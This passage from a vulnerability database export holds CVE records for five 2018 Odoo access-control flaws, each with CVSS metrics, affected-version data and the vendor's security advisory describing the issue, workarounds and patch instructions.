"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32506"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32506 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-6
Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users.
**Affects**: Odoo 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Odoo Framework
**Credits**: Nils Hamerlinck (Trobz), Swapnesh Shah
**CVE ID**: [CVE-2018-14861](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14861)
## I. Background
As of Odoo 8.0, when local passwords are used, the passwords are stored
by default as salted cryptographic hashes (derived via PBKDF2 using
SHA-512 hashing).
In order to protect the cryptographic hashes from being accessed by
users, a special security rule prevents reading the fields where the
password hashes are stored.
## II. Problem Description
A programming error made this special security rule ineffective when
the CSV/Excel export mechanism is used.
This is a regression of the correction for Security Advisory
2016-04a-password-export.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: "Employee" access required
**CVSS3 Score**: Medium :: 4.3
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
By using the CSV export functionality, users with internal "Employee" access
might export the password hashes of other database users, including
those of privileged users.
Exploiting these password hashes to retrieve user passwords is difficult
but not necessarily impossible, for example in the presence of weak
passwords or passwords that may be subject to dictionary attacks.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
No workaround is available, but users that are exclusively authenticated
via remote authentication methods such as LDAP (auth_ldap) are not vulnerable,
as they have no local password.
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 10.0: 0dbed816b90db5be06c60bf0e4a74411c9cf962e
- 11.0: 698314e5d4c145c0b7b9fc323fccc7c3a19de0fc
- 11.0-ent and 10.0-ent (Enterprise): see 11.0 and 10.0.
Version 9.0 is not impacted by this vulnerability.
| [SEC] ODOO-SA-2018-08-07-6 (CVE-2018-14861) - Improper data access control in... | https://api.github.com/repos/odoo/odoo/issues/32506/comments | 0 | 2019-04-08T13:37:39Z | 2019-04-08T13:37:41Z | https://github.com/odoo/odoo/issues/32506 | 430,456,630 | 32,506 |
CVE-2018-14862 | 2019-07-03T19:15:10.580 | Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32504"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32504 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-4
Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: mail
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14862](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14862)
## I. Background
Odoo's chatter engine allows users to create templates for commonly
used messages. To make it faster to use, the system allows template authors
to create a shortcut action to reuse the template.
## II. Problem Description
The shortcut removal mechanism can be abused to remove other part of the
interface.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: User account required
**CVSS3 Score**: High :: 7.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)
A malicious employee could craft malicious RPC requests to cause the deletion
of arbitrary menu entries of the user interface.
While there is no loss of business data, removing the shortcut would make the
system very difficult to use, until repaired.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Restricting the create and write access to the mail.template model to trusted
users only is a way to mitigate the attack until the patch can be applied.
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 91486656ab584cbb7a1f48543ccfe37fb386d850
- 10.0: 2d32609440239bd284fd472851a5c7936aa516ed
- 11.0: 1e42cbc1f425d31bbc83f3994f3bd8836aa201a2
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-4 (CVE-2018-14862) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32504/comments | 0 | 2019-04-08T13:37:34Z | 2019-04-08T13:37:36Z | https://github.com/odoo/odoo/issues/32504 | 430,456,583 | 32,504 |
CVE-2018-14863 | 2019-07-03T19:15:10.643 | Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32508"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32508 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-8
Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Odoo Framework
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14863](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14863)
## I. Background
As of Odoo 8.0, the Odoo framework was considerably changed by the
introduction of a new abstraction layer to communicate with the database,
dubbed the "new API".
To simplify the transition, the new API was initially written with a
backwards-compatibility layer so that it could support modules written for
older versions with limited changes.
## II. Problem Description
A programming error in the backwards-compatibility layer allows bypassing the
access control and remotely accessing private functions.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: User account required
**CVSS3 Score**: High :: 8.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
By crafting a specific RPC request, malicious users (including portal users)
may call private methods, not normally exposed via the RPC API.
An attacker may be able to use them outside of the intended scope to retrieve or
alter information stored in the database.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
No workaround is known, applying the patch is strongly recommended.
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: a1b92ad2b8aa2873e8707ef13660771fd75dba8e
- 10.0: 2c9c7e770addb152f6d424c3ea0f6ac9bcc25a56
- 11.0: ff45f227505df644c70bd02d804f48b3c3e54601
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-8 (CVE-2018-14863) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32508/comments | 0 | 2019-04-08T13:37:44Z | 2019-04-08T13:37:45Z | https://github.com/odoo/odoo/issues/32508 | 430,456,676 | 32,508 |
CVE-2018-14864 | 2019-07-03T19:15:10.707 | Incorrect access control in asset bundles in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32502"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:community:*:*:*",
"matchCriteriaId": "705E446A-98DC-43D6-905A-F52E3FDCAF48",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "F8E37238-5C5A-41E4-8D46-48446E539277",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32502 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-2
Incorrect access control in asset bundles in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment.
**Affects**: Odoo 8.0, 9.0, 10.0 (Community and Enterprise Editions)
**Component**: Core
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14864](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14864)
## I. Background
Odoo's framework includes an automatic mechanism for minifying and
bundling web assets, in order to speed up page loads. This works by
grouping related assets in "bundles", and minifying them together
as a simple file that can be compressed and loaded faster.
As computing and compiling assets is an expensive operation, asset
bundles are cached and stored in the database and file store.
## II. Problem Description
The mechanism used to locate and serve cached assets bundles did not
sufficiently validate the origin of the cached files.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Unprivileged user account required
**CVSS3 Score**: Medium :: 6.3
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)/E:P/RL:O/RC:C
An attacker with a non privileged user account (including a simple portal
user account) could upload a specially crafted attachment in order to
poison the asset bundle cache, and inject arbitrary assets
(JavaScript and CSS code). This could be used to hijack the sessions of
any user accessing the Odoo database via a web browser and allow the
attacker to gain elevated privileges.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
For portal users: administrators can modify the Access Control for
Attachments (`ir.attachment`) and prevent external users (also know as
"portal users") from creating or modifying attachments. External users
do not normally need this permission except for posting messages with
attachments in the portal, which is an acceptable trade-off.
For internal users: administrators could further modify Access Control to
prevent everyone from creating/modifying Attachments (`ir.attachment`).
This will entirely prevent exploiting this vulnerability, but comes with
a great functional impact. Many business processes will be disrupted, so
this should only be used as a temporary solution, until the patch can
be applied.
For Odoo Online: all servers have been patched as soon as the correction
was available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: e5984fbfc3141d83184c13b627a918f4d9913d0c
- 10.0: 19ac9fba0d4be4e30d6103e6ebd49b466adb74b5
- 11.0: bfffe39f1376a56226572295b945a2cc73ba50ce
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-2 (CVE-2018-14864) - Incorrect access control in ass... | https://api.github.com/repos/odoo/odoo/issues/32502/comments | 0 | 2019-04-08T13:37:25Z | 2019-04-08T13:37:30Z | https://github.com/odoo/odoo/issues/32502 | 430,456,495 | 32,502 |
CVE-2018-14865 | 2019-07-03T19:15:10.767 | Report engine in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32501"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32501 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-1
Report engine in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Core
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14865](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14865)
## I. Background
Odoo's report engine relies on the external program "wkhtmltopdf" to generate PDF
documents from HTML files rendered from report templates. Wkhtmltopdf supports
loading remote resources such as images or stylesheets, but also permits loading
local files.
## II. Problem Description
The report engine does not prevent access to local files during rendering by
Wkhtmltopdf.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Unprivileged user account required
**CVSS3 Score**: High :: 7.7
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Untrusted administrators on hosted databases may alter their report templates
in order to trick the report engine into including local server files.
External non-privileged users may also be able to trick the report engine into
including local files, by crafting malicious RPC requests.
Both methods could result in the disclosure of system files that are readable
by the Odoo server process, including Odoo configuration files or other
system files that could possibly include passwords or sensitive data.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Attackers exploiting this vulnerability can only access files readable
by the Odoo server process. Sensitive files might therefore be
protected by using filesystem-level permissions. However, it is very hard to
effectively secure a system in this manner, so applying the patch or updating
your installation is strongly recommended instead.
Alternatively, the wkhtmltopdf executable could be replaced by a command
script that executes the actual wkhtmltopdf command with an extra parameter
"--disable-local-file-access".
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
